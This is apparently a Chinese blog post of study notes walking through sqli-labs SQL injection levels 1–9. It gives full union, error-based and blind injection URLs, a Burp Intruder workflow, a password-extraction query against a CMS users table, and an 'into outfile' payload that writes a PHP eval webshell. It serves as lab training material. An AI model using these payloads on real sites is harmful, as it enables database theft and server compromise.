【CyberSecurityLearning 56】自动化注入
目录
自动化注入
半自动化注入
全自动注入
sqli-labs题库
Less-01
Less-02
Less-03
Less-04
Less-05
如果输出结果显示不全怎么办?
Less-06
Less-07
Less-08
Less-09
自动化注入
半自动化注入
burp
全自动注入
首推:sqlmap
其他:穿山甲/明小子/胡萝卜等
定制化脚本
sqli-labs题库
Less-01
1、尝试改变id参数,结果是页面发生改变(说明数据库中的内容会回显到网页),首选的办法是联合查询
2、通过加单引号,判断是数字型注入还是字符型注入(发现是字符型注入,闭合方式是单引号)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
1后面有其他SQL语句,为了防止后面SQL语句的影响,我们可以把后面注入掉(--+),如果是井号(在url中我们需要把#进行url编码变为%23)
3、and 1=1,and1=2,两次页面状态不同(有布尔类型状态)
4、and sleep(5) (有延时)【sleep语句我们不要管页面显示什么,我们判断依据是时间线】
5、我们做联合查询,把前面的那条SQL语句置为假(and 1=2)
http://42.192.43.56/sqli-labs/Less-1/?id=1' and 1=2 union select 1,version(),3 --+ (做到version就行,因为我们能获得数据库中的敏感信息了)
Less-02
1、尝试改变id参数,结果是页面发生改变(说明数据库中的内容会回显到网页),首选的办法是联合查询
2、通过加单引号,判断是数字型注入还是字符型注入(数字型注入,我们提交的2没有显示到页面,闭合方式没有)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
3、直接用union select判断有多少个列就行
http://42.192.43.56/sqli-labs/Less-2/?id=-2 union select 1,2,database()
Less-03
1、尝试改变id参数,结果是页面发生改变(说明数据库中的内容会回显到网页),首选的办法是联合查询
2、通过加单引号,判断是数字型注入还是字符型注入(字符型注入,因为提交的参数3显示到页面中来了,闭合方式单引号加一个右半括号)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3'') LIMIT 0,1' at line 1
3、我要要想闭合之前的字符串的定义,我们要在2后面添加一个单引号和右半括号,如何把后面--+闭合掉
http://42.192.43.56/sqli-labs/Less-3/?id=3') --+
实际上SQL语句变成了:......'3')--+') LIMIT 0,1
4、http://42.192.43.56/sqli-labs/Less-3/?id=3') and 1=2 union select 1,2,version()--+
Less-04
1、尝试改变id参数,结果是页面发生改变(说明数据库中的内容会回显到网页),首选的办法是联合查询
2、通过加单引号,判断是数字型注入还是字符型注入(发现没反应)
改用双引号测试一下(注意是双引号,不是两个单引号),字符型注入,闭合方式是"),把后面--+注释掉
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"2"") LIMIT 0,1' at line 1
3、http://42.192.43.56/sqli-labs/Less-4/?id=2") and 1=2 union select 1,2,@@datadir--+
Less-05
1、输入id=1和id=2,页面显示一样
2、输入一个单引号(字符型注入,闭合方式是单引号)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1
3、没有回显,有报错,字符型注入,闭合方式单引号,使用报错注入
4、42.192.43.56/sqli-labs/Less-5/?id=2' and updatexml(1,concat(0x5e,version(),0x5e),1) --+
如果输出结果显示不全怎么办?
我们先取出前十六位:
http://42.192.43.56/cms/show.php?id=33 and updatexml(1,concat(0x5e,substr((select password from cms_users ),1,16),0x5e),1)
再取后16位
http://42.192.43.56/cms/show.php?id=33 and updatexml(1,concat(0x5e,substr((select password from cms_users ),17),0x5e),1)
再拼接起来
Less-06
1、输入id=1和id=2,页面显示一样
2、输入一个单引号(没反应),再提交一个双引号(字符型注入,闭合方式是双引号)
没有回显有报错,字符型,双引号闭合
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
--+闭合后和谐
3、http://42.192.43.56/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x5e,(select version()),0x5e),1)--+
Less-07
1、输入id=1和id=2,页面显示一样
2、输入单引号测试(没有报错信息)
You have an error in your SQL syntax
3、and 1=1 / and 1=2
没有回显,没有报错
我们代码审计一下
可以看到闭合方式是'))
4、字符型注入
http://42.192.43.56/sqli-labs/Less-7/?id=2'))--+
5、读写文件
http://42.192.43.56/sqli-labs/Less-7/?id=2')) union select 1,"<?php @eval(\$_REQUEST[777])?>",3 into outfile "D:\\phpStudy\\WWW\\1.php"--+
into outfile 是我们把内容导入到1.php这个文件中去(其实那个$转义不转义都行,建议转义,只要$出现在引号里面并且是作为普通字符串输出,就转义)
写文件成功
打开1.php 发现所要信息
Less-08
1、输入id=1和id=2,页面显示一样
2、输入单引号测试,啥都没有
没有回显,没有报错
添加一个双引号:You are in...(你用双引号显示You are in...说明双引号必定不是闭合方式,考虑是单引号闭合)
3、--+闭合——和谐
4、and 1=1和and 1=2页面状态不一样,有布尔类型状态,考虑布尔盲注,属于字符型注入,闭合方式是单引号
用bp进行半自动化注入(抓包后发到intruder模块)
数据库的长度1在变,我们把1用$引起来,选择payload,选择一个字典,点击“ann from list”选择0-9
得到数据库名的长度 8
*获取数据库名
?id=2' and ascii(substr(database(),1,1))=1--+
攻击类型选择集束炸弹(cluster bomb)
字典
第一个变量1-8
第二个变量1-128
start attack
代码审计一下
Less-09
1、输入id=1和id=2,页面显示一样
2、输入单双引号测试,都是You are in.....
没有回显
3、没有布尔类型状态
4、id后加单引号,加sleep起作用,说明是字符型注入,闭合方式单引号
没有回显,没有报错,没有布尔类型状态,有延时
http://42.192.43.56/sqli-labs/Less-8/?id=2' and if(length(database())=1,sleep(5),1)--+
5、抓包,添加变量
*获取数据库名
字典
变量1:1-8
变量2:1-128
获取成功
【CyberSecurityLearning 56】自动化注入相关推荐
- [网络安全学习篇55]:SQL自动化注入
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- 【愚公系列】2023年05月 网络安全高级班 067.WEB渗透与安全(Havij实战-SQL自动化注入)
文章目录 前言 一.Havij实战-SQL自动化注入 1.简介 2.功能 3.使用 3.1 开启注入 3.2 注入日志 3.3 详细信息 3.4 查看数据 3.5 MD5破解 3.6 寻找后台 3.7 ...
- SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...
- SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)
SQL注入: sqli-labs: 一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境 phpstudy: https://www.xp.cn/ 安装后 ...
- 【SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
目录 1 前言 2 实验介绍 2.1 实验平台 2.2 实验目标 3 实验过程 3.1 前戏 3.2 判断注入点及注入类型 3.3 爆库名 3.4 爆表名 3.5 爆字段名 3.6 爆字段内容 3.7 ...
- 【SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
目录 1 前言 2 自动化注入案例-以sqli-labs-less9为例 2.1 实验平台 2.2 注入前准备 2.3 判断注入点及注入类型 2.3.1 自动判断注入点及注入类型 2.3.2 手动判断 ...
- 生成Xcode templete,自动化注入工程配置
生成Xcode templete,自动化注入工程配置 上一篇: 动态库注入及在非越狱手机使用 上一篇已经讲解了如何生成包含动态库的工程并自动注入APP安装到设备上.但是,每次新建项目,配置各种环境,稍 ...
- Spring实战——无需一行xml配置实现自动化注入
已经想不起来上一次买技术相关的书是什么时候了,一直以来都习惯性的下载一份电子档看看.显然,如果不是基于强烈的需求或强大的动力鞭策下,大部分的书籍也都只是蜻蜓点水,浮光掠影. 就像有位同事说的一样,有些 ...
- 自动化注入工具SQLmap入侵数据库的使用方法(注入攻击)
sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入. 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是 ...
最新文章
- 计算机专业词典_好书优选:实用英汉汉英计算机词典
- vue 2.0 无法编译ES6语法
- Filter(过滤器) 和 interceptor(拦截器)的区别
- python程序怎么修改_详解Python文件修改的两种方式
- linux 命令如何输入,Linux 命令行输入
- leetcode mysql 排名_GitHub - nimphy/leetcode-Mysql
- 21天Jmeter打卡Day18 前置处理器_熟悉常用组件
- 【进阶3-4期】深度解析bind原理、使用场景及模拟实现
- 【一周头条盘点】中国软件网(2018.9.10~2018.9.14)
- draw.io二次开发改造过程
- 计算机语言中daly什么意思,Daly.
- clamped b_spline
- 8051单片机(STC89C52)倒计时器
- 百度关于EMP的探索:落地生产可用的微前端架构
- 算法手撕代码51~55
- 易语言做mysql登录器_易语言制作简单的一个登陆器
- 2021年起重机司机(限桥式起重机)考试题及起重机司机(限桥式起重机)模拟考试
- 淘宝补单计划,如何补基础销量,一周补单量
- 历史人物介绍PPT模板
- CentOS 7.4 搭建LNMP(Linux+Nginx+MySQL+PHP)